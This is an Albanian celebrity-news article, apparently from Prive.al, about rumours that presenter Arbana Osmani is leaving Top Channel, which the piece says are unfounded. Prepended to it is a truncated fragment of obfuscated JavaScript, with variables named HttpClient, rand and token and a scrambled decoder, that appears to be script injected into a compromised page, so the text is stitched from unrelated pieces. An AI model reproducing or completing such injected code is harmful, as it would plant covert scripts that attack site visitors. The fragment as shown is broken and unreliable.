;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Arbana sapo i bëri lëmsh të gjithë për largimin nga Top Channel

By

Ka gati 20 vite në media, fillimisht në radio e pastaj në televizion duke pasur shumë suksese në karrierën e saj.

Mirëpo, emri i Arbana Osmanit nuk është përfolur asnjëherë më shumë sesa muajve të fundit.

Fillimisht për lidhjen e supozuar me regjisorin e programit të saj e pastaj edhe për largimin nga Top Channel.

Ky proces u bë një dramë në vete në portale mirëpo u harrua shpejt shkaku që prezantuesja vijoi programin normalisht siç e kishte paraparë deri në fund të muajit Maj.

E pak ditë para episodit të fundit, Arbana me postimin e ri në Instagram ka aktivizuar portalet sërish.

‘Ditët e fundit në Top, e lodhur por e lumtur’ – shprehet prezantuesja në postimin e bërë duke ngjallur dyshime për largimin përfundimtar nga familja mediatike në të cilën nisi karrierën.

View this post on Instagram

Ditet e fundit ne Top, tired but happy.

A post shared by Arbana Osmani (@arbanao) on

Megjithatë, duket se bëhet fjalë vetëm për ditët e fundit para mbarimit të sezonit të tretë të ‘Dua të të bëj të lumtur’. E pyetur se ku po shkon, prezantuesja është shprehur në komente se do ikë më pushime. E pyetur se a do rikthehet, Arbana ka deklaruar: ‘patjetër’.

Një tjetër komentuesi që akuzonte drejtorin e Top Channel për largimit, Osmani i është përgjigjur: ‘Paske bo film’.

Duket se edhe këtë herë, mediat online janë vënë në lajthitje për largimin nga Top Channel i cili me gjasë nuk do të ndodhë. /Prive.al

Artikuj të ngjashëm